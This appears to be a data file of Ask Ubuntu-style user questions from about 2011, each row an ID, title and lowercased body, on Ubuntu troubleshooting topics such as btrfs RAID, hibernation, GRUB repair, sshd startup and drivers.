85148	how to convert a btrfs file system in raid1 mode to raid0 ?	i 've install ubuntu 11.10 with btrfs as the / file system ( was a bit of a mess to do , i 'll explain if people are interested ) so i can expand the primary file system into the second drive on the system ( * ) . after installing the system , i ran btrfs device add /dev/sdb1 / and it added the new device and expanded the file system on to it , and all was good . but according to the ( wrong ) manual i was reading , i also had to run btrfs filesystem balance and this apparently converted my filesystem to `` raid1 '' mode so everything is stored redundantly twice - once on each drive , and i can only use 50 % of my total capacity : $ btrfs filesystem df / data , raid0 : total=78.00gb , used=41.57gb system , raid1 : total=8.00mb , used=16.00kb system : total=4.00mb , used=0.00 metadata , raid1 : total=3.75gb , used=355.06mb its a nice feature , but i was kind of wanting to use `` raid0 '' ( stripping ) . i 've tried to remove the new device so i can re-add it , but when i try that i get an error and syslog has this : btrfs : unable to go below two devices on raid1 so my question is : how can i convert my filesystem back to raid0 so i can use the total space of both disks ? ( * ) like can be done with lvm , but with btrfs you can host multiple `` partitions '' on the same `` file system '' and space is allocated dynamically where you need it - unlike in lvm .
85149	what does `~/ ` mean ?	i 'm new to linux and ubuntu . people keep using ~/filename in their answers to my questions . what does ~/ mean ?
85152	is it safe to remove zram swap enabler ?	i have recently installed zram swap enabler , which initially seemed great as it made almost everything seem snappier than before , however over time the spike in cpu for compressing/decompressing ram is causing more stuttering and pauses than i would like and kinda defeats the point of having it . anyway , as i understand it , it modifies the kernel ( i think ) so i am wondering is it safe to uninstall through synaptic or is removing zram swap enabler something more involved ? thanks
85154	mount ufs filesystem	how do i mount a partition with ufs filesystem ( freenas ) in ubuntu 11.10 ? i 'm a total ubuntu newbie and just switched from freenas . there should be ll the info i need i guess , but if anyone would help me get going i 'll by glad = ) http : //manpages.ubuntu.com/manpages/hardy/man8/mount.8.html
85161	thinkpad edge 15 - wake from hibernation issues after upgrade to 11.10	after upgrading ubuntu from 10.10 to 11.10 ( though 11.04 ) the hibernation fails once in a while . with 10.10 i used uswsusp - it does not work at all on 11.10 ( uninstalled ) so i use ordinary swsusp . the ordinary hibernation fails to start once in a while : sometimes starts clearly after hibernation without problems sometimes i get kernel panic sometimes it just reboots itself . happens with unity , gnome , xfce and kde . the behavior is not consistent any ideas how can it be fixed or at least properly debugged ?
85162	how can i change the wallpaper using a python script ?	i want to change my wallpaper in ubuntu 11.10 ( with unity ) in a small python script . i found the possibility to change it via the gconf-editor in /desktop/gnome/background/picture_filename . with python-gconf , i 'm able to change the necessary values . apparently , the gconf string is not read out . if i change it ( either via a script or via gconf-editor ) , the wallpaper remains and in the menu of `` change wallpaper '' , the old wallpaper is shown . how am i able to change the wallpaper for unity via a python script ? the following code does work . # ! /usr/bin/python # -*- coding : utf-8 -*- from gi.repository import gio class backgroundchanger ( ) : schema = 'org.gnome.desktop.background' key = 'picture-uri' def change_background ( self , filename ) : gsettings = gio.settings.new ( self.schema ) print ( gsettings.get_string ( self.key ) ) print ( gsettings.set_string ( self.key , `` file : // '' + filename ) ) gsettings.apply ( ) print ( gsettings.get_string ( self.key ) ) if __name__ == `` __main__ '' : backgroundchanger ( ) .change_background ( `` /home/user/existing.jpg '' )
85165	after suspend/hibernate fn keys function is inverted thinkpad x121e	on my thinkpad x121e running ubuntu 11.10 i have a problem with the fn key after the laptop went to suspension mode or hibernate ( does not matter which one , occurs with both ) . after resuming from such modes the working of the fn key is inverted , i.e . normally you would use fn+f5 to toggle the radios ( bluetooth and wlan ) , but after the suspension hitting just f5 toggles it , while you have to press fn+f5 to get the normal `` f5 '' event . also if you swap the fn and ctrl key in the efi settings it works normally until suspension or hibernate was used , then the key suddenly start to get their orignal functionality until you reboot . has somebody some advise how to solve this , this behaviour is very distracting since you ca n't use suspend and hibernate any more ( or you have to think twice every time before hitting the affected keys ) . update : i have been in contact with the lenovo support . both a change of the keyboard module and a attempt to fix it in their repair centre have been unsuccessful . i returned the device to lenovo and got my money back . it seems this ( among others ) is a persistent problem with this model series . i got a different device from another company now .
85168	how to switch back to ati card after using switcheroo ?	i have been using switcheroo to turn off my ati radeon hd5650 using the switch : echo off > /sys/kernel/debug/vgaswitcheroo/switch this has worked perfectly . i 've added it to /etc/rc.local . the intel graphics card is fine for most of my day to day work and i get huge battery life compared to the radeon card . lately though , i 've been trying to run some graphically intensive apps which will not run under the intel chipset . if i try to run : echo on > /sys/kernel/debug/vgaswitcheroo/switch my laptop ( acer timelinex 3820tg ) just crashes - i have to reisub to recover . my questions are : how am i supposed to turn the ati card back on when needed ? assuming i 'm doing the right thing by using echo on > /sys/kernel/debug/vgaswitcheroo/switch - should i file a bug report ? and if so where ? any feedback would be most appreciated . i 'm currently running ubuntu 11.04 on ( as mentioned ) an acer timelinx 3820tg using the gnome classic desktop .
85171	graphic cards compatibility	i am currently using an old desktop . it 's a dell dimension 2400 , pentium 4 , intel celeron 2.4 ghz processor . i need to upgrade the graphic card because when i installed ubuntu 10.04 ( 32-bit ) , i was limited of it 's use . every time i go and change the screensaver , it crashes and the monitor turns on and off contiously . i wanted to use the advanced desktop settings so i can have enhanced effects while moving windows around but it wo n't let me . there are many choices of graphic cards out there , however , i am only limited to a `` pci '' only ( not pci-x or pci-e ) and only a `` ddr '' ( not ddr2 or 3 ) . my concern is what is the right graphic card for my desktop ? ... and that is also compatible with ubuntu 10.04 ?
85172	what is a good place to collect lists of applications ?	i want to know where i can find lists of applications and where to put them as well . i have some questions here on au that are lists and i want to move them to one place for easy access for everyone . lists are good if they are up to date ; and if you are looking for new software lists are the best . so has anyone some recommendations on places where lists of applications can belong ? they are n't allowed on any of the se sites according to the faq . requirements i would like to divide my applications lists in games , multimedia , web browsers etc . but i would also like to link to other sites where i can find software . especially software that is n't in the usc
85182	how do i put back gimp scripts , brushes , fonts etc after installing 11.10 ?	i have installed ubuntu 11.10 earlier today . have to say that it does take quite some getting used to after using windows 7 but it looks great and i think i 'm getting the feel for it . except for a couple of issues . for example : i am an experienced gimp user , and even make money with it . i had a lot of additional scripts/brushes/fonts/etc added to my gimp when using windows 7 . before switching os i made a backup of those files on my external drive . now i want to put those back into the gimp installation in ubuntu . how do i go about this ? i have located the gimp entry in the 'share ' folder , but am not allowed to copy any files to it , the system says i 'm not the 'root ' . i 'm probably doing it wrong ; ubuntu is a whole other world than windows . any ideas ? thanks in advance ! edit : in general , i might also ask the following question , which will help me with the above and just about all my other issues : - where are my programs located ? in other words : what is in ubuntu , what 'program files ' is in windows ? and are there differences between the two ? can you edit files in ubuntu like you can in windows ? why i 'm asking this , is : a lot of stuff you can download from the web comes with a description similar to `` download this and put the file in ... / ... / ... / ... '' since a lot of programs do not run on ubuntu , placing in the files manually is the only remaining way to do it , like with the gimp utilities . or is there another way ?
85183	why do my menus have little icons next to the items ?	recently little icons appeared in all my menus , eg the hard drive w/ green arrow next to save , orange folder next to open , etc . this has happened in every file , edit , etc menus for every single application , and its really annoying . any idea how to shut them off ? update ok , i put both of the below settings to menus have no icons , but now the icons are back ! i rechecked the setting and they both say they 're off , but the icons are still here ...
85185	rosegarden plugin list is empty	i 've just installed rosegarden through apt . i 've also installed jack and a low latency kernel through a ppa https : //launchpad.net/~abogani/+archive/ppa . i 've started jack-server and through the control panel i can see its wiring things through rosegarden . i 've also tried installing qsynth and dssi both through apt . however i ca n't see any plug ins in the synth plug-in list . therefore i 'm unable to test if this works . i 've tried launching qsynth before rosegarden and i 've tried a few things however i just ca n't see any plugins . does anyone know how to get this to work ? i 'm using ubuntu 11.04 or 11.10 i think . sudo apt-get install rosegarden -o apt : :install-suggests=true synaptic sudo apt-get install synaptic synaptic sudo synaptic synaptic sudo apt-add-repository ppa : abogani/ppa sudo apt-get install linux-lowlatency sudo apt-get install dssi sudo apt-get install alsa-firmware-loaders alsa-tools alsa-tools-gui alsa-firmware sudo apt-get install alsa-firmware-loaders alsa-tools alsa-tools-gui sudo apt-get install blop caps cmt fil-plugins rev-plugins swh-plugins tap-plugins sudo apt-get install blepvco mcp-plugins omins
85186	how can i limit the space assigned to déjà dup backups ?	i 'd like to use déjà dup to backup my system on a remote file server . the backup itself is working fine . however , i have n't seen a way to limit the size of the backup and the configuration says the backups will be kept for at least x months or until the free space runs low . so i do n't want my backup to eat up all the available disk space . is there a way to limit the backup size in déjà dup itself , or do i have to create a share on the server with limited space ( some kind of shared mounted image with x gb of space ) ?
85187	show battery as percentage , not time ?	i just recently installed ubuntu 11.10 ( i 've used older versions , but i 'm still a noob ) , and ( almost ) everything works fine . i just want to know if there 's a way to show battery remaining as a percentage , not as time remaining . the battery icon says batter ( 0:41 to charge , but i just want to know what percent full my battery is . power settings only lets me choose whether to suspend/hibernate/etc . in certain situations . where would i find an option to change this ? as an aside , i also ca n't find where to change or even add a screen saver . the older versions i used ( 10.04 i think ) had tons of options to tweak everything ( from the gui ) , where did they all go ? also , i 've seen other answers saying to install docky , but i switched from osx and love the dock system in 11.10 .
85189	error trying to mount freebsd/ufs partition from freenas	i get this strange error trying to mount ufs partition . sudo mount -r -t ufs -o ufstype=ufs2 /dev/sdb2 /home/tim/ufs_mount mount : wrong fs type , bad option , bad superblock on /dev/sdb2 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so i 'm a ubuntu newbie and just switched from freenas . tim @ t3 : ~ $ sudo fdisk -l disk /dev/sda : 400.1 gb , 400088457216 bytes 255 heads , 63 sectors/track , 48641 cylinders , total 781422768 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a77a6 device boot start end blocks id system /dev/sda1 * 2048 765700095 382849024 83 linux /dev/sda2 765702142 781422591 7860225 5 extended /dev/sda5 765702144 781422591 7860224 82 linux swap / solaris disk /dev/sdb : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x90909090 device boot start end blocks id system /dev/sdb1 * 63 240974 120456 a5 freebsd /dev/sdb2 240975 2928601304 1464180165 a5 freebsd /dev/sdb3 2928601305 2930272064 835380 a5 freebsd
85193	windows 8 messed me up	i installed windows 8 on my computer and ruined my ubuntu partition . now i ca n't get my grub to come up . here 's the catch , i installed ubuntu inside windows and i even tried the fix that was given on the forums right here , dedicated grub2 partition and windows 8 . that did n't work . would a complete reinstall of ubuntu be the only fix ? i 'm totally lost and i 'm already getting sick and tired of windows 8 : p .
85198	mouse sensitivity to low	i want to increase mouse sensitivty above the maximum in ubuntu 11.10 , since even that is way too low for me . how do i do it ?
85200	where can i find the man page for the set command ?	$ set frog pets $ echo $ 1_ $ 2 frog_pets man set is not bringing me anything = ( neither is which set or whereis set
85204	will an upgrade install all main ubuntu desktop package ?	i installed ubuntu and removed some default ubuntu packages such as unity and scroll overlay . will this packages be installed again if i upgrade to the next release of ubuntu ?
85209	is there a mac osx version of ubuntuone planned for the near future ?	since there is no ubuntuone client for mac osx to download , will there be one in the near future ?
85213	brightness button ( fn + f5/f6 ) does not work after installing kubuntu 11.10	i installed the kubuntu 11.10 on my laptop and now the brightness keys do not work . before i was using debian and they functioned normally . could someone tell me if the problem is it just me or is the problem with this version of kubuntu ? how to make it work again ?
85214	how can i prevent iwconfig power management from being turned on ?	i am affected by this bug : 869502 . a workaround which seems to stop the kernel panics for me is to disable wlan0 power management : sudo iwconfig wlan0 power off however it seems to automatically turn power management back on when i unplug the power cable and i think at many other times , too . is there something that might be causing this ? does anyone know how i can prevent it ?
85215	where did printer driver settings go on a canon ip 3100 ?	i have had my canon ip 3100 printer for years , and with every version of ubuntu , since around 8 or so , it has been auto detected and worked perfectly . now , with ubuntu 11.10 , it has been detected as some kind of `` generic text only printer '' , and i ca n't even print a test page . i 've looked at the printer interface , and there does n't seem to be any way at all to manually select the right printer driver . this is all there is in the printer dialogue in the settings manager : the only place to go is `` options '' , but if you do that , all you get is this : not much to go on . i have also tried removing it and reinstalling it , but that has not helped . how do i get my printer drivers back ?
85216	videos , songs , and all media playing in fast forward	whenever i try to play a video or song , on youtube or using banshee , the media plays as if it 's in fast forward . everything ran fine , videos and songs played normal , all hardware worked fine , and then suddenly tonight it started doing this fast forward thing . i 'm running ubuntu 11.10 64-bit on my hp pavillion dv7-4285dx , no modifications to my hardware or software .
85221	turn off wine debugging	how do i make wine not showing any debug messages the default setting ? i 've found winedebug=-all wine ./program.exe as a way to turn off debug for the program i 'm currently running , but how do i make it the default for everything ?
85226	how do i make update manager stop opening automatically ?	update manager keeps opening automatically and it 's getting very annoying , especially when i 'm using gnome shell . how do i make it stop ?
85230	how do i access my ubuntu on cloud from a browser ?	i just had a real scare and i thought i lost all my pictures . i had uploaded everything to ubuntu1 and a bit later thought my hard drive crashed . is there a way to get ubuntu1 cloud files without a ubuntu computer ?
85233	how can i change a set of files permsissions from root to user	i copied a set of bluej files from /usr/share/doc/bluej to a ~/bluej directory however the files in folders are set to root permission and read only i need to be able to read/write them . so in bluej folder there are subfolders for each project for example 'shapes ' folder . i found this command here for changing a singular file file permissions ubuntu user @ host : /home/user $ sudo chmod o+x /usr/local/bin/somefile but how can i change the folder permissions and subsequently all files in folders for every project folder in '~/bluej'
85236	ca n't install applications on software center	i try to install apps on software center and nothing happens it does'nt ask me to enter my password or anything when i click install it so annoying ... it 's for all apps ... ..
85241	how can i change the name `` rubbish bin '' to `` trash '' ( or `` recycle '' )	a recent update ( ubuntu 10.04 ) has caused my trash bin to be renamed to `` rubbish bin '' .. i do n't like this new name . how can i change it ? i 've tried : gconf-editor - > apps/nautilus/desktop - > trash_icon_name but that did n't work . also , $ home/.config/user-dirs.dirs has no entry for the trash directory ...
85246	running .bat on ubuntu using wine	i needed to run a .bat file on ubuntu 10.04 , so i installed wine and brought up the console . my .bat file has r scripts , and when i run start test.bat i get the following error : wine : can not find l '' c : \\windows\\system32\\rscript.exe '' i know i have r as i use it the regular way , but this is my first experience with wine . any suggestions on how to fix the error ... .do i need to install r again . thx !
85250	is it preferred to avoid use of `` exit '' in bash scripts as much as possible ?	i 've been told in php it 's preferred to avoid the use of the exit command as much as possible . is the same true for bash ? for example is the following # ! /bin/bash if [ -z $ 1 ] ; then echo you need to enter the directory you want to backup else sourcefile= $ 1 targetfile=/home/me/desktop/mybackups/files_ $ ( date + % y_ % m_ % d_ % s ) tar cvf $ targetfile $ sourcefile fi preferred to this ? # ! /bin/bash if [ -z $ 1 ] ; then echo you need to enter the directory you want to backup exit fi sourcefile= $ 1 targetfile=/home/me/desktop/mybackups/files_ $ ( date + % y_ % m_ % d_ % s ) tar cvf $ targetfile $ sourcefile
85253	how do i place shortcuts from bookmarks onto desktop	i want to put shortcuts from my bookmarks onto my desktop . i tried to drag and drop from bookmarks to desktop , but it did n't work , , , help please .
85254	can not boot from usb disk with `` not a com32r image '' error	after installing 11.10 on my dell studo 15 ( model 1557 ) laptop , it started to overheat . recently it even shutdown twice saying that critical temperature has reached even when i was just idling ( not even a single program was open except for firefox ) . after learning that it is a problem with 3.0.0 kernel i decided to roll back to 10.04 lts . i have downloaded the most recent 10.04 iso from ubuntu.com and created a live usb using startup disk creator in 11.10 . but when i am trying to boot from usb i am getting the following error vesamenu.c32 : not a com32r image i have installed ubuntu from usb stick a couple of dozen times before this and i think it is not a problem with my hardware . please tell me what to do .
85256	any way to swap some file or some %	is there any way to do some % swap example i want to swap 2 % of my data to swap or is there any way i can swap some program example i want to swap firefox , or any program
85257	folding at home client installation w/ origami	i 'm running lucid lynx ; i downloaded origami and have it installed via sudo command in terminal . the next step is to use origami to do the installation of the f @ h client ... when i try the recommended commands for ubuntu 8.04 and newer , here 's what happens : ( my input ) : sudo origami install -t 45104 -u pjkaiser ( terminal output ) : installing ... please be patient error : startup script failed to start ! i 'm still pretty new to linux distros , so an help would be greatly appreciated . thanks !
85261	bumblebee x server not avaliable	i 've installed bumblebee for better battery life , and after installing bumblebee , i 've seen some advance in battery performance . however , i ca n't use optirun command , since running it gives me that the bumblebee x server is not available . the logs are here : http : //pastebin.ubuntu.com/760115/ . ubuntu oneiric ocelot , i5-460m , gt310m , noveau driver
85268	grub booting problem	i 'd ubuntu 11.04 32 bit installed via wubi on windows 7 64 bit . the installation was a success . i 'd either access ubuntu , or windows 7 on the boot option of my computer . i made use of both os for months until when i 'd only access windows 7. whenever i click/select the ubuntu tab , it goes straight to grub . displaying ; grub version 1.98+20100804-5 minimal bash-like line editing ... ... .. grub > _ i 'm a rookie at this . please help !
85269	how to install software from source and tell the apt-get that i have installed the version ?	for installing software from source : ./configure make sudo make install how to tell the apt-get that the software has been installed , so that sudo apt-get install somesoftware will show that the software has been installed ? ( the software is in the ubuntu package repository , but with older versaion . )
85275	libreoffice - items missing when document is saved in .docx	i am using the pre-installed libreoffice 3.4 with ubuntu 11.10 . using the drawing tool , i draw a few flowcharts , with the default flowchart symbols . if i save my work in odt format , it will be no problem . however , when i save my work in docx format , close and re-open the file , all my flowcharts are missing . i 've tried doc format as well . and no matter i draw the flowchart directly , or put them inside a frame , same result . i do n't have a personal printer , the printer i use is connect to a windows machine , and its microsoft word can not read odt file , because the admin does not update the suite . why does this happen ?
85277	why is the size of /proc/kcore smaller than ram ?	i was wondering why it is so . all links ( i 've found ) concerning the size of the file state that the size is about the same as the size of physical ram , or the size processor can address . i 'm on 32bit . i sometimes use kcore when i need to string the ram to look for deleted text . /proc/kcore : 1.1gb ram : 2.6 gb ~ $ ll /proc/kcore -r -- -- -- -- 1 root root 1065349120 2011-12-05 09:42 /proc/kcore ~ $ sudo dd if=/proc/kcore of=/dev/null bs=1024 1040380+0 records in 1040380+0 records out 1065349120 bytes ( 1.1 gb ) copied , 2.26191 s , 471 mb/s ~ $ free -m total used free shared buffers cached mem : 2509 1742 766 0 132 1118 -/+ buffers/cache : 492 2016 swap : 1051 0 1051 ~ $ grep ^mem /proc/meminfo memtotal : 2569640 kb memfree : 791548 kb ~ $ dmesg | grep memory [ 0.000000 ] memory : 2554056k/2612412k available ( 4940k kernel code , 57908k reserved , 2333k data , 688k init , 1703108k highmem ) ~ $ sudo lspci -v -s 00:02.0 00:02.0 vga compatible controller : intel corporation 82915g/gv/910gl integrated graphics controller ( rev 04 ) ( prog-if 00 [ vga controller ] ) subsystem : intel corporation device 4556 flags : bus master , fast devsel , latency 0 , irq 16 memory at ffa00000 ( 32-bit , non-prefetchable ) [ size=512k ] i/o ports at ec00 [ size=8 ] memory at c0000000 ( 32-bit , prefetchable ) [ size=256m ] memory at ffa80000 ( 32-bit , non-prefetchable ) [ size=256k ] expansion rom at < unassigned > [ disabled ] capabilities : [ d0 ] power management version 2 kernel driver in use : i915 kernel modules : i915 the full output of dmesg and lspci on ubuntu pastebin . does anybody know why it is so or - is anybody seeing the same behaviour ( size ( kcore ) < size ( ram ) ) ?
85281	eclipse not using dual core on ubuntu 9.10	i am using eclipse on ubuntu 10.10 32bit , when i am compiling a huge android project , it is getting slower i have 4gb ram even ( which is just 25 % used ) though its getting slower when i observed further eclipse is using only one cpu and creating 100 % load on that where as other cpu is having only 20 % load , is this eclipse problem or ubuntu problem
85285	prevent mouse cursor from jumping around	i 've been using ubuntu 11.10 ( fresh install ) for a month on a asus n43sl . mouse pointer has gone haywire this morning . it had been working fine before except for the occasional freeze which was usually fixed by the following : rmmod psmouse modprobe psmouse but , this has n't been working this time . totally lost trackpad function an hour ago . connected usb mouse but the cursor is still jumpy . i installed synaptiks touchpad manager and the problem went away for about 30 minutes ( no reboot ) . i am currently using the `` disable touchpad automatically when usb mouse is plugged in '' option in synaptiks . the mouse cursor is not jumpy as when mouse is plugged in but as soon as mouse is unplugged and touchpad is active ; mouse cursor goes haywire . so , the question is how to prevent the mouse pointer from going haywire ?
85289	kde telepathy releases 0.2	i 'm currently using the kde telepathy ppa thats newly updated to telepathy-kde-0.2 and i 'm running into a serios blocker which wo n't let me log into any of my accounts . on using the account manager it just displays the message : - `` there was a problem while trying to connect ** @ gmail.com- # ( or any other account for that matter ) # some of the im components are not working correctly ( and your system does not tell us which one ) . i would like to know if this is persistent for others as well or is it something with my conf , note i 've been using the ppa since conception . thanks in advance image attached to show problem .
85298	ati eah4350 adapter configuration	i have an ati eah4350 adapter and the latest ubuntu 11.10 . i connected the adapter using hdmi and i did n't have sound . so i installed fglrx using the readme from their site . now i have sound but the picture is n't smooth in videos as it was before installing the fglrx . how can it be repaired ? thanks
85304	boot freeze with logitech unifying receiver	i 've bought an m570 mouse from logitech . it runs plug and play with ubuntu , but the system hangs on boot with the logitech unify receiver inserted . i must unplug the usb receiver before booting and insert it again on the login screen . nothing appears in syslog ( it freezes at very early stage ) . note : another logitech receiver is plugged on my computer ( cordless keyboard receiver ) lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0409:0059 nec corp. highspeed hub bus 004 device 002 : id 046d : c505 logitech , inc. cordless mouse+keyboard receiver bus 001 device 003 : id 2304:0237 pinnacle systems , inc. pctv 73e [ dibcom dib7000pc ] bus 001 device 004 : id 046d : c52b logitech , inc. unifying receiver xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=10 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ ir-receiver inside an usb dvb receiver id=8 [ slave keyboard ( 3 ) ] ↳ logitech usb receiver id=9 [ slave keyboard ( 3 ) ] ↳ logitech usb receiver id=11 [ slave keyboard ( 3 ) ] what can i do to make these devices work without freezing ?
85306	how to debug sshd not running at startup on server	i have a ( virtual ) server running an ubuntu 10.04 minimal system . i seem to have misconfigured sshd so that it does not start up on reboot . since this is a server , i now do not have shell access to my server anymore . any ssh request results in this : ssh : connect to host xxx.xxx.xxx.xxx port 22 : connection refused and /var/run/sshd.pid does not exist . i do have access to the file system through a virtuozzo panel the server provider has installed . i have not edited the /etc/init.d/ssh start script but i did copy it to /etc/rc2.d/ssh in hopes that this would start ssh at reboot . i also tried adding a startup call to /etc/crontab : 7 * * * * root /usr/bin/touch /root/cron_is_running 8 * * * * root /etc/init.d/ssh start neither do i get the file /root/cron_is_running nor is sshd starting up my logfiles do not provide much in the way of error messages for ssh , f.e . /var/log/syslog only shows a lot of named stuff at startup and some mysql upgrade stuff , that is surely not related . i appreciate any help , i already configured a bunch of things on that server and by installing a new image i would loose all data on the server . update : changing the script in /etc/rc2.d/ssh to /etc/rc2.d/s90ssh did not have any effect . /var/log/auth.log does not contain any lines that hint at ssh trying to start up , it is full of these lines however : update 2 : as suggested i also tried adding /usr/sbin/sshd to /etc/rc.local . but a test with touch /tmp/test seems to suggest this file is not executed despite +x flag being set . i also tried adding sleep 10 at the beginning of the rc.local script because it was suggested elsewhere that this script had concurrency issues . final update thanks to the below answers again . they were huge help in fixing the missing sshd startup in the rcx.d/ directories . the final fix was to start a `` repair '' from the virtuozzo panel , this mounts the original system as part of the filesystem of a recovery system with the original network settings . i could log into that with ssh . i copied the working ssh configs from the recovery system over the ssh configs of the broken original system , finished the recovery and now i can log in again .
85307	how to load graphical display manager when booting ?	the thing is my ubuntu 11.10 does not boot properly , each time i try to boot , the ubuntu logo appears for a brief time , a very small loading happens , then a black screen appears with things like the following : * stopping anac ( h ) ronistic cron [ ok ] * starting anac ( h ) ronistic cron [ ok ] * stopping cold plug devices [ ok ] * stopping log initial device creation [ ok ] i 've noticed that the lines i get vary , sometimes i also have additional lines like : * starting the windbind daeomon winbind [ ok ] * pulseaudio configured for per-user sessions sand disabled ; edit /etc/default/saned [ ok ] * starting cups printing spooler/server [ ok ] things i did : i installed some packages using synaptic , packages that allow me to install .tar.gz , the installation went good , but when i restarted my computer i was unable to boot i do n't know if this has anything to do with my problem fixes i tried : i tried to update then upgrade , still same problem . i tried to boot from live usb and ran dpkg fix and the other one for the boot file , still same problem recovery mode gives me the same problem any help please ?
85309	how to enable dropping any file type on particular or any unity launcher item ?	for example i can not drag and drop folders and .py files to the meld using launcher but it accepts them perfectly .
85314	`` file too short '' error while loading libtermcap.so / libncurses.so	on my ubuntu 11.10 , i am running a version of gdb for different target other than host machine and i am getting the following error : xxxxx-none-linux-gnu-gdb : error while loading shared libraries : /usr/lib/libtermcap.so.2 : file too short following is the list of my libncurses and libtermcap on my host : $ ls -l /usr/lib/libtermcap . * lrwxrwxrwx 1 root root 12 2011-09-17 00:59 /usr/lib/libtermcap.a - > libncurses.a lrwxrwxrwx 1 root root 13 2011-09-17 00:59 /usr/lib/libtermcap.so - > libncurses.so lrwxrwxrwx 1 root root 22 2011-12-05 17:32 /usr/lib/libtermcap.so.2 - > /usr/lib/libncurses.so $ ls -l /usr/lib/libncurses* -rw-r -- r -- 1 root root 221876 2011-09-17 00:59 /usr/lib/libncurses.a -rw-r -- r -- 1 root root 113216 2011-09-17 00:59 /usr/lib/libncurses++.a -rw-r -- r -- 1 root root 31 2011-09-17 00:59 /usr/lib/libncurses.so $ cat /usr/lib/libncurses.so input ( libncurses.so.5 -ltinfo ) $ uname -a linux hostname 3.0.0-13-generic-pae # 22-ubuntu smp wed nov 2 15:17:35 utc 2011 i686 i686 i386 gnu/linux how to get over this issue ?
85317	64-bit livecd wo n't boot ... 32-bit does	i 've been using 11.10 32-bit for a while , and found some spare dimms lying around . i put them in my machine and it detected them fine , but obviously 32-bit ubuntu could n't . rather than re-install i tried to use the pae kernel but this toasted my machine . so i decided to just go ahead and install 64-bit version . trouble is the livecd ( or usb ) wo n't boot . it loads the desktop and mouse icon before taking me to a high-res text screen that says : stopping system v runlevel compatibility [ ok ] it then hangs here . if i use the 32-bit version it loads the desktop fine ! what can i do ? my hardware : asus p5q pro intel core 2 quad q6600 @ 2.40ghz x4 geforce 9600gt 4x 1gb ddr2 ram modules
85318	how can i get my graphics card to be recognized in system info ?	i am new to linux/ubuntu . i installed ubuntu 11.10 on my lenovo ideapad y510 . system info says graphics : unknown . driver : unknown , experience : standard . what should i do to use all my laptop hardware components to work properly with ubuntu ? screenshot :
85321	how do you change the launcher icon to visualize the active workspace ?	i want the unity launcher icon to show me ( at a glance ) on which workspace i am ( as in most of the other desktop environments ) - is there a way to ? i tried to search the issue but there are too many duplicate wordings like `` how order/remove/resize launcher icons '' , and so on . the closest one was this , but not sufficient either : http : //www.techdrivein.com/2011/05/top-6-quicklists-for-ubuntu-1104-natty.html
85324	will ubuntu minimal cd install ubuntu-desktop on release upgrade or just installed packages ?	normal ubuntu desktop will update ubuntu-desktop package and it 's dependencies on release upgrade . will ubuntu minimal cd install ubuntu-desktop on release upgrade or just installed packages ?
85325	where is my xfce in ubuntu11.10	i recently ( now ) installed xfce in ubuntu 11.10 . i used : sudo apt-get install xfce4 it downloads 22mb approx . files . then i restarted my pc , it asked my password . i did n't type my password . i closed this window ( i thought it may be a virus/hack ) . after restart , there is no xfce . again i tried : sudo apt-get install xfce4 but no use . it says xfce4 with latest . installed already . what do i need to do now ?
85327	automatically check for updates , but do n't open update manager window	i am using ubuntu 11.10 on a netbook with 1 gb ram and a single-core 1.66 ghz intel atom processor . if i have too many things running at a time , the system becomes quite slow ( disk i/o seems to be the bottleneck ) , so i am careful to avoid this . naturally , i want to be in control of when resource-hungry things run . i do all my package management from the terminal . i use byobu , and have set it to show the number of packages to be upgraded in the bottom row . every now and then update manager pops up to inform me about updates . this seems to be an a very resource-hungry application - it causes disk thrashing , and the window starts out as being unresponsive ( compiz makes it grey ) , and takes a long time to start accepting mouse input . this causes a disruption in whatever i 'm doing , and the update manager does n't even go away quickly after i click the cross button in the title bar . so here is what i want : the system should automatically check for updates as it does now . this is fine . the update manager window should never open unless i manually open it . i can see that there are packages to upgrade at the bottom of my terminal window , and i do n't want the system to spring bloated gui windows on me when i 'm not expecting it . is there a way to do this ? i guess i could disable the update manager automatic checks and learn about cron and use that to do a aptitude update at regular intervals ... but there should be a better , more direct way ! but there is no `` do nothing '' option in the dialog box below :
85333	how do i change my user permissions to edit /etc/apt/sources.list ?	i need to alter sources.list i am able to make the changes but it will not save , keeps saying i do n't have the permissions to do that .
85334	continue button disabled during installation	i had to format my hdd due to windows 7 problems . i could n't only re-install the windows os and i had to format my hdd and install both oses again . i successfully installed the w7 and when i came to install ubuntu 11.10 i got stuck at `` choose a picture '' screen . the `` continue '' button is disabled and i can not click it . i take picture of my self - nothing . i select picture from the existing pictures - nothing . just the installation is blocked there . the ubuntu version i have is done with remastersys . i wanted to keep all my settings from my ubuntu and install it with them . is it possible the remastersys version to make the installation stuck there ? i really want to install the os with my current settings which i have in the installation from remastersys . ideas ? i forgot to say that i can boot the os as live cd from the usb . here is a picture of what i have while trying something from the post you 've linked . you can see how the continue button is little bit different than the back button . the same happens when i directly try to install the os without booting it as live cd .
85337	how to set a new cyclic wallpaper in ubuntu 11.10 ?	with cyclic wallpaper i mean the one that changes automatically image every tot seconds/minutes . there 's only one by default in ubuntu 11.10 ( you can see a white clock on the thumbnail ) , but i ca n't figure out how to add a new one with my images .
85349	how to install gitolite on ubuntu 10.10 server ?	i am trying to install gitolite on an ubuntu 10.10 server . it seems from the google that gitolite should have a package in the repos , but i dont see any install candidates on my box . i can grab the source from github , but not entirely sure how to install that ... any help on how to get gitolite installed ?
